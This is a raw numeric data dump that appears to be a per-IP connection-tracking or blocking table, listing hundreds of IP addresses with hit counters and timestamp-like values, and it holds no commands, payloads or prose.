0 2 0 0 29066432 0 0 29066432 0 206.168.34.95 5 0 0 0 1 0 0 28642991 0 0 28642991 0 104.166.80.198 5 0 0 0 1 0 0 28994131 0 0 28994131 0 34.75.247.129 5 0 0 0 1 0 0 29190077 0 0 29190077 0 156.59.29.231 5 0 0 0 2 0 0 29177642 0 0 29177642 0 24.46.35.234 5 0 0 0 1 0 0 28772507 0 0 28772507 0 206.168.34.118 5 0 0 0 2 0 0 28685532 0 0 28685532 0 159.223.185.57 5 0 0 0 1 0 0 28662200 0 0 28662200 0 206.168.34.117 5 0 0 0 1 0 0 29094260 0 0 29094260 0 147.185.132.156 5 0 0 0 1 0 0 29173694 0 0 29173694 0 45.144.212.129 5 0 0 0 2 0 0 29264526 0 0 29264526 0 159.65.24.243 5 0 0 0 1 0 0 29364928 0 0 29364928 0 91.196.152.229 5 0 0 0 2 0 0 29029556 0 0 29029555 0 206.168.34.81 5 0 0 0 1 0 0 28641515 0 0 28641515 0 104.166.80.183 5 0 0 0 1 0 0 29116060 0 0 29116060 0 177.222.239.46 5 0 0 0 1 0 0 29154022 0 0 29154022 0 37.27.57.109 5 0 0 0 1 0 0 29294094 0 0 29294094 0 206.168.34.72 5 0 0 0 2 0 0 29116763 0 0 29116763 0 206.168.34.71 5 0 0 0 1 0 0 29308779 0 0 29308779 0 213.209.157.232 5 0 0 0 1 0 0 28839572 0 0 28839572 0 104.200.76.162 5 0 0 0 1 0 0 28759615 0 0 28759615 0 188.165.87.97 5 0 0 0 2 0 0 28993875 0 0 28759620 0 188.165.87.96 5 0 0 0 1 0 0 28641364 0 0 28641364 0 205.169.39.236 5 0 0 0 2 0 0 28687280 0 0 28687280 0 35.88.16.221 5 0 0 0 1 0 0 29347371 0 0 29347371 0 91.133.14.243 5 0 0 0 36 0 0 28817163 0 0 28817163 0 138.197.191.87 5 0 0 0 1 0 0 28706506 0 0 28706506 0 206.168.34.54 5 0 0 0 2 0 0 29287557 0 0 29287557 0 206.168.34.53 5 0 0 0 4 0 0 28755706 0 0 28755706 0 164.92.85.85 5 0 0 0 5 0 0 28783611 0 0 28653726 0 135.148.100.196 5 0 0 0 2 0 0 29381285 0 0 29381285 0 206.189.137.54 5 0 0 0 1 0 0 28729324 0 0 28729324 0 205.169.39.217 5 0 0 0 3 0 0 28822637 0 0 28781199 0 172.225.233.9 5 0 0 0 2 0 0 28642710 0 0 28642710 0 152.42.172.246 5 0 0 0 1 0 0 29013272 0 0 29013272 0 147.185.132.112 5 0 0 0 1 0 0 28912535 0 0 28912535 0 147.185.132.111 5 0 0 0 1 0 0 29352801 0 0 29352801 0 147.185.132.109 5 0 0 0 3 0 0 29262735 0 0 29262734 0 206.168.34.38 5 0 0 0 1 0 0 29309405 0 0 29309405 0 34.124.133.182 5 0 0 0 2 0 0 29373476 0 0 29212481 0 3.146.111.124 5 0 0 0 16 0 0 29382436 0 0 29382436 0 140.245.126.6 5 0 0 0 2 0 0 28736634 0 0 28706580 0 147.185.132.106 5 0 0 0 1 0 0 29366495 0 0 29366495 0 178.206.27.219 5 0 0 0 1 0 0 29354343 0 0 29354343 0 205.169.39.198 5 0 0 0 2 0 0 28645435 0 0 28645435 0 134.122.41.83 5 1 0 0 0 28641362 0 0 28641362 0 0 87 18.237.215.124 5 0 0 0 1 0 0 29320542 0 0 29320542 0 34.70.236.233 5 0 0 0 2 0 0 29146055 0 0 29146055 0 106.75.152.140 5 0 0 0 2 0 0 28643418 0 0 28641896 0 194.55.186.251 5 0 0 0 1 0 0 29360585 0 0 29360585 0 37.112.223.135 5 0 0 0 1 0 0 28648722 0 0 28648722 0 104.166.80.130 5 0 0 0 4 0 0 29175186 0 0 29110573 0 107.174.224.18 5 0 0 0 1 0 0 28641453 0 0 28641453 0 104.166.80.128 5 0 0 0 1 0 0 29027182 0 0 29027182 0 47.79.2.223 5 0 0 0 14 0 0 29345841 0 0 29302618 0 3.222.165.167 5 0 0 0 1 0 0 29365432 0 0 29365432 0 35.196.65.214 5 0 0 0 1 0 0 29007444 0 0 29007444 0 196.251.88.97 5 0 0 0 2 0 0 29346579 0 0 29173614 0 91.196.152.155 5 0 0 0 147 0 0 29372583 0 0 29372582 0 20.222.33.203 5 0 0 0 2 0 0 28757815 0 0 28757815 0 172.225.190.114 5 0 0 0 1 0 0 28823486 0 0 28823486 0 103.102.230.7 5 0 0 0 2 0 0 29273703 0 0 29273703 0 185.216.201.78 5 0 0 0 1 0 0 28642895 0 0 28642895 0 104.166.80.115 5 0 0 0 4 0 0 28806414 0 0 28806414 0 164.92.77.30 5 0 0 0 1 0 0 29355648 0 0 29355648 0 34.1.18.83 5 0 0 0 2 0 0 28771976 0 0 28771976 0 172.225.190.104 5 0 0 0 1 0 0 29195781 0 0 29195781 0 34.82.63.151 5 0 0 0 21 0 0 29079147 0 0 29079147 0 209.38.21.107 5 0 0 0 1 0 0 29363932 0 0 29363932 0 89.175.186.196 5 0 0 0 4 0 0 28993222 0 0 28993219 0 45.139.104.144 5 1 0 0 0 28992843 0 0 28992843 0 0 87 13.61.151.97 5 0 0 0 1 0 0 28861949 0 0 28861949 0 199.45.155.90 5 0 0 0 2 0 0 28644823 0 0 28644823 0 157.230.113.90 5 0 0 0 2 0 0 29365231 0 0 29365231 0 165.232.189.54 5 0 0 0 20 0 0 29294837 0 0 29294836 0 35.223.90.192 5 0 0 0 1 0 0 28930740 0 0 28930740 0 172.121.219.97 5 0 0 0 1 0 0 28641368 0 0 28641368 0 180.149.23.248 5 0 0 0 3 0 0 29223679 0 0 29223679 0 199.45.155.82 5 0 0 0 6 0 0 28989787 0 0 28989787 0 206.189.137.101 5 0 0 0 3 0 0 29267261 0 0 29267261 0 199.45.155.78 5 0 0 0 2 0 0 28901598 0 0 28901598 0 44.233.153.31 5 1 0 0 0 28729323 0 0 28729323 0 0 87 54.187.83.180 5 0 0 0 1 0 0 29250910 0 0 29250910 0 20.171.207.215 5 0 0 0 1 0 0 29376798 0 0 29376798 0 199.45.155.74 5 1 0 0 0 28905003 0 0 28905003 0 0 87 23.178.112.216 5 0 0 0 2 0 0 29128561 0 0 29128561 0 199.45.155.73 5 1 0 0 0 28992843 0 0 28992843 0 0 87 23.178.112.214 5 0 0 0 1 0 0 28641887 0 0 28641887 0 179.43.167.18 5 0 0 0 3 0 0 29038445 0 0 29038444 0 139.59.44.201 5 0 0 0 1 0 0 28761112 0 0 28761112 0 199.45.155.70 5 0 0 0 1 0 0 29177746 0 0 29177746 0 34.118.8.111 5 0 0 0 1 0 0 28997571 0 0 28997571 0 199.45.155.64 5 0 0 0 3 0 0 28730052 0 0 28642266 0 47.88.93.234 5 0 0 0 1 0 0 28817165 0 0 28817165 0 205.169.39.131 5 0 0 0 1 0 0 29065857 0 0 29065857 0 18.201.196.173 5 0 0 0 1 0 0 28642266 0 0 28642266 0 47.251.15.21 5 0 0 0 1 0 0 28646008 0 0 28646008 0 18.220.90.129 5 0 0 0 1 0 0 29356172 0 0 29356172 0 13.218.111.30 5 0 0 0 1 0 0 29181553 0 0 29181553 0 147.185.132.84 5 0 0 0 1 0 0 28986303 0 0 28986303 0 205.210.31.6 5 0 0 0 2 0 0 28735314 0 0 28735314 0 98.81.85.113 5 0 0 0 1 0 0 29010612 0 0 29010612 0 3.143.217.87 5 0 0 0 1 0 0 29080868 0 0 29080868 0 205.169.39.116 5 0 0 0 1 0 0 29180853 0 0 29180853 0 196.251.88.26 5 0 0 0 1 0 0 28770937 0 0 28770937 0 185.27.134.52 5 0 0 0 1 0 0 28720691 0 0 28720691 0 3.254.180.232 5 0 0 0 1 0 0 29347242 0 0 29347242 0 192.36.109.127 5 0 0 0 1 0 0 28650592 0 0 28650592 0 147.185.132.72 5 1 1 0 9 28771976 0 29239895 28771976 0 28771976 772 104.28.62.1 5 0 0 0 1 0 0 29321583 0 0 29321583 0 147.185.132.70 5 0 0 0 1 0 0 28771976 0 0 28771976 0 104.28.62.0 5 0 0 0 1 0 0 28706401 0 0 28706401 0 199.45.154.158 5 0 0 0 4 0 0 28725477 0 0 28725477 0 146.190.137.54 5 0 0 0 1 0 0 29327520 0 0 29327520 0 163.5.212.39 5 0 0 0 1 0 0 29226560 0 0 29226560 0 147.185.132.60 5 0 0 0 1 0 0 28745171 0 0 28745171 0 167.94.145.98 5 0 0 0 1 0 0 29232976 0 0 29232976 0 35.197.106.49 5 0 0 0 1 0 0 28905005 0 0 28905005 0 151.115.77.26 5 0 0 0 1 0 0 28927761 0 0 28927761 0 167.94.145.96 5 0 0 0 1 0 0 28772537 0 0 28772537 0 199.45.154.148 5 0 0 0 1 0 0 28730052 0 0 28730052 0 47.88.5.56 5 0 0 0 1 0 0 28839571 0 0 28839571 0 45.5.65.27 5 0 0 0 1 0 0 29174033 0 0 29174033 0 34.16.128.53 5 0 0 0 12 0 0 29069643 0 0 29069642 0 18.175.152.3 5 0 0 0 1 0 0 29343503 0 0 29343503 0 103.204.130.101 5 0 0 0 1 0 0 29241577 0 0 29241577 0 147.185.132.49 5 0 0 0 1 0 0 28800109 0 0 28800109 0 199.45.154.142 5 1 0 0 0 29080865 0 0 29080865 0 0 87 35.164.90.90 5 0 0 0 1 0 0 29190281 0 0 29190281 0 147.185.132.48 5 0 0 0 16 0 0 28905525 0 0 28905524 0 138.199.58.43 5 0 0 0 1 0 0 28741586 0 0 28741586 0 147.185.132.46 5 0 0 0 1 0 0 28641364 0 0 28641364 0 34.69.236.108 5 0 0 0 55 0 0 29364908 0 0 28905004 0 164.90.208.56 5 0 0 0 1 0 0 29272976 0 0 29272976 0 161.97.181.43 5 0 0 0 3 0 0 29058576 0 0 29058576 0 206.189.109.247 5 0 0 0 1 0 0 28987038 0 0 28987038 0 80.94.95.157 5 16 0 0 153 29346542 0 29381361 28641361 0 29381149 1024 194.87.217.15 5 0 0 0 3 0 0 29315953 0 0 29246758 0 3.140.182.19 5 0 0 0 1 0 0 29373380 0 0 29373380 0 146.19.27.141 5 0 0 0 1 0 0 29185661 0 0 29185661 0 147.185.132.39 5 0 0 0 1 0 0 28972810 0 0 28972810 0 147.185.132.40 5 0 0 0 1 0 0 29205530 0 0 29205530 0 147.185.132.36 5 0 0 0 2 0 0 29300318 0 0 29300318 0 165.232.40.27 5 0 0 0 2 0 0 29106976 0 0 29106976 0 31.56.56.147 5 0 0 0 63 0 0 29316571 0 0 29313765 0 34.58.79.188 5 0 0 0 6 0 0 29228729 0 0 29228317 0 45.141.215.193 5 0 0 0 1 0 0 29049151 0 0 29049151 0 147.185.132.31 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.72 5 0 0 0 3 0 0 29350466 0 0 29302226 0 44.193.254.10 5 0 0 0 1 0 0 28759680 0 0 28759680 0 51.254.49.102 5 0 0 0 6 0 0 29360485 0 0 29088228 0 124.236.100.56 5 0 0 0 2 0 0 29290433 0 0 29290433 0 167.99.221.207 5 0 0 0 1 0 0 28757958 0 0 28757958 0 54.155.34.189 5 0 0 0 2 0 0 29377835 0 0 29377835 0 105.188.1.247 5 0 0 0 137 0 0 29379198 0 0 29379197 0 20.37.96.143 5 1 0 0 0 29080865 0 0 29080865 0 0 87 23.178.112.109 5 1 0 0 0 29346542 0 0 29346542 0 0 87 23.178.112.108 5 0 0 0 1 0 0 29128071 0 0 29128071 0 35.187.65.14 5 0 0 0 2 0 0 28729324 0 0 28641363 0 95.217.18.177 5 0 0 0 2 0 0 29269794 0 0 29142716 0 45.148.10.80 5 2 0 0 0 29258704 0 0 28641362 0 0 174 23.178.112.104 5 0 0 0 2 0 0 29085922 0 0 29083028 0 3.238.104.250 5 0 0 0 12 0 0 29001894 0 0 29001894 0 35.181.5.182 5 2 0 0 0 28817163 0 0 28729323 0 0 174 23.178.112.100 5 0 0 0 17 0 0 29285439 0 0 29285439 0 52.169.25.28 5 0 0 0 1 0 0 29260393 0 0 29260393 0 130.211.193.91 5 1 0 0 0 28729323 0 0 28729323 0 0 87 18.141.10.214 5 0 0 0 4 0 0 29327000 0 0 29263549 0 92.223.85.60 5 0 0 0 1 0 0 29236604 0 0 29236604 0 192.177.58.110 5 0 0 0 1 0 0 29015618 0 0 29015618 0 192.177.58.109 5 0 0 0 1 0 0 28822529 0 0 28822529 0 35.90.180.7 5 0 0 0 1 0 0 28930772 0 0 28930772 0 192.177.58.107 5 0 0 0 2 0 0 28906454 0 0 28906454 0 106.75.154.180 5 0 0 0 3 0 0 28760125 0 0 28687824 0 45.148.10.59 5 0 0 0 2 0 0 29199476 0 0 29199476 0 68.183.11.79 5 0 0 0 1 0 0 29369500 0 0 29369500 0 196.251.85.87 5 0 0 0 1 0 0 28780326 0 0 28780326 0 34.27.64.153 5 0 0 0 1 0 0 28641392 0 0 28641392 0 192.175.111.238 5 0 0 0 2 0 0 28993864 0 0 28993864 0 164.92.113.84 5 0 0 0 63 0 0 29159383 0 0 29159381 0 143.110.182.89 5 0 0 0 6 0 0 28870090 0 0 28861112 0 87.247.158.120 5 0 0 0 20 0 0 29356487 0 0 28861291 0 115.231.78.8 5 0 0 0 1 0 0 28641392 0 0 28641392 0 192.175.111.232 5 0 0 0 21 0 0 29389628 0 0 29389628 0 136.119.132.133 5 0 0 0 1 0 0 28641392 0 0 28641392 0 192.175.111.228 5 1 0 0 0 28641362 0 0 28641362 0 0 87 13.250.59.69 5 0 0 0 3 0 0 29154967 0 0 29152988 0 13.57.215.215 5 0 0 0 3 0 0 29129083 0 0 29129083 0 46.101.20.153 5 0 0 0 4 0 0 29083512 0 0 29083512 0 115.231.78.2 5 0 0 0 1 0 0 29355885 0 0 29355885 0 143.198.8.155 5 0 0 0 1 0 0 29154246 0 0 29154246 0 89.117.19.179 5 0 0 0 1 0 0 29250910 0 0 29250910 0 4.227.36.20 5 0 0 0 2 0 0 29259568 0 0 29259568 0 165.22.75.56 5 0 0 0 134 0 0 29376909 0 0 29376908 0 20.222.66.73 5 0 0 0 2 0 0 29239822 0 0 29239822 0 143.198.137.97 5 0 0 0 4 0 0 28715384 0 0 28715384 0 64.23.226.227 5 0 0 0 1 0 0 28665625 0 0 28665625 0 34.247.56.202 5 0 0 0 155 0 0 29389715 0 0 29389715 0 172.190.142.176 5 0 0 0 1 0 0 29176049 0 0 29176049 0 95.182.100.70 5 0 0 0 8 0 0 29372534 0 0 29372534 0 91.211.93.148 5 0 0 0 4 0 0 28821023 0 0 28821023 0 24.144.95.97 5 0 0 0 2 0 0 28733179 0 0 28733179 0 37.248.248.69 5 0 0 0 1 0 0 28680325 0 0 28680325 0 45.196.45.128 5 0 0 0 1 0 0 29146878 0 0 29146878 0 45.32.52.232 5 0 0 0 1 0 0 29118674 0 0 29118674 0 176.98.186.51 5 0 0 0 1 0 0 28984001 0 0 28984001 0 198.235.24.244 5 0 0 0 1 0 0 29332315 0 0 29332315 0 198.235.24.243 5 0 0 0 1 0 0 29202200 0 0 29202200 0 35.90.170.126 5 0 0 0 4 0 0 29081603 0 0 28729325 0 207.241.225.134 5 0 0 0 1 0 0 28993616 0 0 28993616 0 198.235.24.239 5 0 0 0 1 0 0 29019415 0 0 29019415 0 198.235.24.240 5 0 0 0 36 0 0 29346543 0 0 29346543 0 134.209.25.199 5 0 0 0 1 0 0 28677369 0 0 28677369 0 198.235.24.236 5 0 0 0 16 0 0 28912937 0 0 28912937 0 45.139.252.15 5 0 0 0 1 0 0 28905253 0 0 28905253 0 146.70.221.23 5 0 0 0 1 0 0 29411527 0 0 29411527 0 185.247.137.169 5 0 0 0 2 0 0 29195388 0 0 29195388 0 104.248.171.179 5 0 0 0 1 0 0 29202407 0 0 29202407 0 198.235.24.222 5 0 0 0 2 0 0 29362869 0 0 29362869 0 206.119.173.163 5 0 0 0 4 0 0 28796543 0 0 28796543 0 159.89.0.241 5 1 0 0 0 28817163 0 0 28817163 0 0 87 54.255.44.116 5 0 0 0 1 0 0 29008657 0 0 29008657 0 198.235.24.218 5 0 0 0 1 0 0 28707024 0 0 28707024 0 198.235.24.214 5 0 0 0 1 0 0 29361167 0 0 29361167 0 213.208.175.2 5 0 0 0 1 0 0 29268909 0 0 29268909 0 15.207.50.92 5 0 0 0 1 0 0 29180843 0 0 29180843 0 103.129.214.43 5 0 0 0 2 0 0 29086085 0 0 29086085 0 143.198.59.239 5 0 0 0 1 0 0 29406460 0 0 29406460 0 172.121.218.140 5 0 0 0 1 0 0 29062432 0 0 29062432 0 124.222.209.139 5 0 0 0 2 0 0 28859782 0 0 28859782 0 44.242.141.240 5 0 0 0 149 0 0 29340771 0 0 29340771 0 74.226.128.72 5 1 0 0 0 28905003 0 0 28905003 0 0 87 13.60.235.76 5 0 0 0 2 0 0 29104032 0 0 28918590 0 198.235.24.195 5 0 0 0 3 0 0 28997921 0 0 28997921 0 68.183.84.21 5 0 0 0 3 0 0 28947643 0 0 28947643 0 174.138.74.111 5 0 0 0 1 0 0 28994466 0 0 28994466 0 198.235.24.201 5 0 0 0 3 0 0 29197216 0 0 29197216 0 162.142.125.212 5 0 0 0 1 0 0 29084978 0 0 29084978 0 38.207.131.211 5 0 0 0 2 0 0 29039231 0 0 29039231 0 162.142.125.208 5 0 0 0 1 0 0 29354445 0 0 29354445 0 34.1.23.22 5 0 0 0 3 0 0 29363636 0 0 29363636 0 193.39.160.207 5 0 0 0 2 0 0 29210896 0 0 29045303 0 198.235.24.185 5 0 0 0 2 0 0 28731623 0 0 28731623 0 37.248.248.20 5 0 0 0 3 0 0 28987581 0 0 28987581 0 137.184.163.76 5 0 0 0 1 0 0 28825199 0 0 28825199 0 18.141.213.162 5 0 0 0 3 0 0 29346233 0 0 28650624 0 198.235.24.182 5 0 0 0 1 0 0 28662411 0 0 28662411 0 162.142.125.203 5 0 0 0 2 0 0 29346877 0 0 29346877 0 37.221.66.252 5 0 0 0 1 0 0 28800058 0 0 28800058 0 162.142.125.192 5 0 0 0 2 0 0 29003443 0 0 28827701 0 198.235.24.181 5 0 0 0 1 0 0 29198368 0 0 29198368 0 198.235.24.180 5 0 0 0 1 0 0 28933491 0 0 28933491 0 198.235.24.179 5 0 0 0 65 0 0 29289461 0 0 29289460 0 13.215.254.40 5 0 0 0 1 0 0 29406460 0 0 29406460 0 103.105.167.218 5 0 0 0 3 0 0 29149527 0 0 29149527 0 138.197.145.12 5 0 0 0 5 0 0 29358298 0 0 29358298 0 89.109.50.196 5 0 0 0 2 0 0 29172373 0 0 29172373 0 146.70.59.134 5 0 0 0 1 0 0 29027670 0 0 29027670 0 185.247.137.125 5 1 0 0 0 29346542 0 0 29346542 0 0 87 3.145.25.10 5 0 0 0 1 0 0 29186679 0 0 29186679 0 198.235.24.173 5 0 0 0 16 0 0 29399817 0 0 29399817 0 167.71.216.13 5 0 0 0 2 0 0 29279771 0 0 29279771 0 188.166.38.100 5 1 0 0 0 29258704 0 0 29258704 0 0 87 13.48.192.95 5 0 0 0 2 0 0 29370688 0 0 29370688 0 207.154.231.178 5 0 0 0 42 0 0 29311382 0 0 29311382 0 52.178.144.89 5 0 0 0 1 0 0 29057250 0 0 29057250 0 198.235.24.168 5 0 0 0 4 0 0 28760576 0 0 28760576 0 142.93.241.194 5 1 0 0 0 28729323 0 0 28729323 0 0 87 16.16.170.177 5 0 0 0 2 0 0 29053251 0 0 28712598 0 198.235.24.164 5 0 0 0 1 0 0 29028164 0 0 29028164 0 47.82.9.42 5 0 0 0 1 0 0 29103520 0 0 29103520 0 104.232.39.136 5 0 0 0 2 0 0 29198268 0 0 29198268 0 161.35.100.117 5 0 0 0 1 0 0 28735950 0 0 28735950 0 198.235.24.161 5 0 0 0 3 0 0 29280695 0 0 29105498 0 198.235.24.158 5 0 0 0 2 0 0 29105708 0 0 28748584 0 198.235.24.154 5 0 0 0 76 0 0 29335553 0 0 29335553 0 48.210.209.53 5 0 0 0 6 0 0 29410489 0 0 29071997 0 145.220.91.19 5 0 0 0 2 0 0 29277224 0 0 28987861 0 198.235.24.152 5 0 0 0 2 0 0 29327283 0 0 29096333 0 198.235.24.151 5 0 0 0 1 0 0 28936482 0 0 28936482 0 198.235.24.150 5 0 0 0 2 0 0 29175308 0 0 29175308 0 159.65.159.185 5 0 0 0 1 0 0 29340767 0 0 29340767 0 198.235.24.147 5 0 0 0 2 0 0 29287102 0 0 29239301 0 198.235.24.146 5 0 0 0 1 0 0 29221240 0 0 29221240 0 198.235.24.143 5 0 0 0 4 0 0 29180810 0 0 29180752 0 167.179.87.227 5 0 0 0 1 0 0 29227315 0 0 29227315 0 198.235.24.141 5 0 0 0 1 0 0 28832961 0 0 28832961 0 198.235.24.139 5 0 0 0 2 0 0 29209542 0 0 29209542 0 138.197.150.129 5 0 0 0 1 0 0 29236241 0 0 29236241 0 198.235.24.140 5 0 0 0 2 0 0 29202360 0 0 28914028 0 198.235.24.138 5 0 0 0 1 0 0 29267703 0 0 29267703 0 198.235.24.137 5 0 0 0 1 0 0 28843052 0 0 28843052 0 3.249.133.47 5 0 0 0 1 0 0 28714124 0 0 28714124 0 198.235.24.134 5 1 1 0 17 28790573 0 28790580 28790573 0 28790573 772 46.179.197.191 5 0 0 0 1 0 0 29193917 0 0 29193917 0 47.82.60.47 5 0 0 0 1 0 0 28745690 0 0 28745690 0 198.235.24.128 5 0 0 0 1 0 0 29371770 0 0 29371770 0 198.235.24.127 5 0 0 0 1 0 0 28989662 0 0 28989662 0 198.235.24.9 5 0 0 0 2 0 0 28972027 0 0 28972027 0 106.75.132.208 5 0 0 0 1 0 0 29232497 0 0 29232497 0 198.235.24.126 5 0 0 0 1 0 0 29365290 0 0 29365290 0 34.44.243.216 5 0 0 0 2 0 0 29360728 0 0 29360728 0 206.189.50.63 5 0 0 0 1 0 0 28685311 0 0 28685311 0 198.235.24.5 5 0 0 0 2 0 0 29229795 0 0 29229795 0 209.38.194.181 5 0 0 0 16 0 0 28906567 0 0 28906566 0 146.70.248.6 5 1 0 0 0 29258704 0 0 29258704 0 0 87 44.248.28.176 5 0 0 0 2 0 0 29350827 0 0 29350827 0 104.131.184.105 5 0 0 0 1 0 0 29043951 0 0 29043951 0 198.235.24.118 5 0 0 0 1 0 0 29292774 0 0 29292774 0 198.235.24.2 5 0 0 0 6 0 0 29400874 0 0 29394053 0 35.170.13.97 5 0 0 0 1 0 0 29195071 0 0 29195071 0 77.90.153.227 5 0 0 0 2 0 0 29181124 0 0 29181124 0 138.197.111.26 5 0 0 0 1 0 0 28954970 0 0 28954970 0 162.142.125.123 5 0 0 0 1 0 0 29177744 0 0 29177744 0 34.122.147.229 5 0 0 0 2 0 0 28866624 0 0 28866624 0 139.59.1.107 5 0 0 0 1 0 0 29031068 0 0 29031068 0 47.79.123.182 5 0 0 0 1 0 0 29203985 0 0 29203985 0 47.82.60.26 5 0 0 0 1 0 0 28831645 0 0 28831645 0 198.235.24.108 5 0 0 0 1 0 0 29110957 0 0 29110957 0 172.245.241.123 5 0 0 0 2 0 0 29238523 0 0 29238523 0 194.233.79.48 5 0 0 0 2 0 0 28859117 0 0 28859117 0 106.75.169.16 5 0 0 0 1 0 0 28760992 0 0 28760992 0 167.94.145.111 5 0 0 0 1 0 0 28738605 0 0 28738605 0 198.235.24.104 5 0 0 0 2 0 0 29115517 0 0 29115517 0 167.94.145.109 5 0 0 0 2 0 0 29137858 0 0 29137858 0 167.99.7.160 5 0 0 0 2 0 0 28665243 0 0 28665243 0 142.93.105.148 5 0 0 0 1 0 0 28745212 0 0 28745212 0 167.94.145.108 5 0 0 0 1 0 0 28873763 0 0 28873763 0 167.94.145.107 5 3 3 0 15 28641362 0 28641362 28641362 0 28641362 3704 165.227.39.235 5 0 0 0 1 0 0 29127574 0 0 29127574 0 170.39.218.59 5 0 0 0 3 0 0 29267409 0 0 29267409 0 162.142.125.112 5 0 0 0 1 0 0 28930740 0 0 28930740 0 103.105.167.129 5 0 0 0 3 0 0 28967924 0 0 28967924 0 104.236.247.43 5 0 0 0 1 0 0 29122582 0 0 29122582 0 198.54.114.110 5 0 0 0 1 0 0 29053895 0 0 29053895 0 196.251.86.211 5 0 0 0 20 0 0 29361058 0 0 29361058 0 136.115.243.204 5 0 0 0 1 0 0 29263273 0 0 29263273 0 196.251.86.207 5 0 0 0 1 0 0 29184040 0 0 29184040 0 47.82.60.13 5 0 0 0 1 0 0 28830123 0 0 28830123 0 167.94.145.100 5 0 0 0 1 0 0 29173569 0 0 29173569 0 91.231.89.39 5 0 0 0 1 0 0 28710880 0 0 28710880 0 198.235.24.99 5 0 0 0 1 0 0 29035375 0 0 29035375 0 47.82.10.50 5 0 0 0 8 0 0 29229248 0 0 28922852 0 115.231.78.15 5 0 0 0 3 0 0 29179785 0 0 29179785 0 64.23.175.141 5 0 0 0 1 0 0 29177744 0 0 29177744 0 205.169.39.68 5 0 0 0 1 0 0 29364921 0 0 29364921 0 91.231.89.34 5 0 0 0 3 0 0 29078850 0 0 29078850 0 152.42.138.114 5 0 0 0 4 0 0 28958456 0 0 28958456 0 115.231.78.12 5 0 0 0 1 0 0 29346572 0 0 29346572 0 91.231.89.32 5 0 0 0 151 0 0 29400764 0 0 29400763 0 51.103.100.253 5 0 0 0 2 0 0 28876768 0 0 28876768 0 134.122.50.64 5 0 0 0 1 0 0 29335093 0 0 29335093 0 34.244.74.132 5 0 0 0 1 0 0 29198828 0 0 29198828 0 205.169.39.58 5 0 0 0 1 0 0 29304690 0 0 29304690 0 173.249.22.177 5 0 0 0 1 0 0 28682547 0 0 28682547 0 198.235.24.81 5 0 0 0 1 0 0 29003485 0 0 29003485 0 198.235.24.79 5 0 0 0 206 0 0 29220651 0 0 29220645 0 185.177.72.210 5 0 0 0 1 0 0 29022146 0 0 29022146 0 47.79.123.143 5 0 0 0 1 0 0 29111131 0 0 29111131 0 205.169.39.49 5 0 0 0 1 0 0 29235051 0 0 29235051 0 198.235.24.77 5 1 0 0 0 29258704 0 0 29258704 0 0 87 52.77.247.33 5 0 0 0 2 0 0 29117738 0 0 29117738 0 134.122.35.163 5 0 0 0 1 0 0 29368326 0 0 29368326 0 188.68.178.8 5 0 0 0 1 0 0 28817191 0 0 28817191 0 205.169.39.47 5 1 0 0 0 28905003 0 0 28905003 0 0 87 47.129.29.29 5 0 0 0 2 0 0 29206985 0 0 29206985 0 185.177.72.204 5 1 1 0 39 28761886 0 28860053 28761886 0 28740820 772 140.248.24.3 5 0 0 0 1 0 0 28672154 0 0 28672154 0 205.169.39.44 5 0 0 0 55 0 0 28860053 0 0 28747572 0 140.248.24.2 5 0 0 0 1 0 0 28641367 0 0 28641367 0 203.78.172.129 5 0 0 0 1 0 0 28676101 0 0 28676101 0 198.235.24.70 5 0 0 0 4 0 0 28766152 0 0 28766152 0 143.198.96.16 5 0 0 0 1 0 0 28743042 0 0 28743042 0 198.235.24.65 5 0 0 0 4 0 0 28814238 0 0 28814238 0 188.166.122.73 5 0 0 0 1 0 0 28706606 0 0 28706606 0 198.235.24.64 5 0 0 0 1 0 0 29223859 0 0 29223859 0 45.80.158.145 5 0 0 0 2 0 0 29089888 0 0 28718158 0 198.235.24.59 5 0 0 0 1 0 0 29384862 0 0 29384862 0 93.158.90.147 5 0 0 0 1 0 0 29028019 0 0 29028019 0 47.79.98.30 5 0 0 0 58 0 0 29243214 0 0 29190016 0 185.177.72.179 5 0 0 0 1 0 0 29080877 0 0 29080877 0 205.169.39.29 5 0 0 0 1 0 0 28737095 0 0 28737095 0 198.235.24.57 5 0 0 0 2 0 0 29347326 0 0 29267729 0 198.235.24.56 5 0 0 0 1 0 0 28641364 0 0 28641364 0 65.154.226.167 5 0 0 0 1 0 0 29007089 0 0 29007089 0 198.235.24.55 5 0 0 0 1 0 0 29352116 0 0 29352116 0 213.136.93.169 5 0 0 0 1 0 0 29207826 0 0 29207826 0 205.169.39.26 5 0 0 0 1 0 0 29100517 0 0 29100517 0 198.235.24.54 5 0 0 0 1 0 0 28731464 0 0 28731464 0 198.235.24.53 5 0 0 0 1 0 0 29214045 0 0 29214045 0 47.79.242.230 5 0 0 0 1 0 0 29276031 0 0 29276031 0 35.207.254.201 5 0 0 0 1 0 0 29182403 0 0 29182403 0 104.164.104.37 5 0 0 0 1 0 0 29377383 0 0 29377383 0 198.235.24.49 5 0 0 0 1 0 0 28729329 0 0 28729329 0 205.169.39.21 5 0 0 0 1 0 0 29227884 0 0 29227884 0 198.235.24.48 5 0 0 0 142 0 0 29404800 0 0 29404800 0 4.241.209.139 5 0 0 0 2 0 0 29273209 0 0 29254589 0 23.180.120.243 5 0 0 0 1 0 0 29015849 0 0 29015849 0 198.235.24.44 5 0 0 0 185 0 0 29383263 0 0 29383262 0 40.122.123.38 5 0 0 0 3 0 0 29351603 0 0 28729333 0 205.169.39.15 5 0 0 0 3 0 0 29018235 0 0 29018235 0 206.189.15.133 5 0 0 0 1 0 0 29364341 0 0 29364341 0 198.235.24.39 5 0 0 0 1 0 0 28761071 0 0 28761071 0 34.248.75.228 5 0 0 0 2 0 0 28641363 0 0 28641363 0 66.115.189.177 5 0 0 0 1 0 0 29021026 0 0 29021026 0 47.79.123.101 5 0 0 0 1 0 0 28712774 0 0 28712774 0 198.235.24.36 5 0 0 0 1 0 0 29276147 0 0 29276147 0 198.235.24.35 5 0 0 0 2 0 0 29357108 0 0 28742896 0 198.235.24.34 5 0 0 0 1 0 0 29186439 0 0 29186439 0 198.235.24.33 5 0 0 0 1 0 0 29302882 0 0 29302882 0 34.1.30.255 5 0 0 0 1 0 0 28714332 0 0 28714332 0 198.235.24.30 5 0 0 0 1 0 0 29111670 0 0 29111670 0 198.235.24.28 5 0 0 0 2 0 0 29080868 0 0 28729324 0 104.197.69.115 5 0 0 0 1 0 0 29320938 0 0 29320938 0 196.251.86.122 5 0 0 0 3 0 0 29354786 0 0 29354786 0 95.24.239.9 5 0 0 0 8 0 0 29372537 0 0 29372537 0 46.39.228.71 5 0 0 0 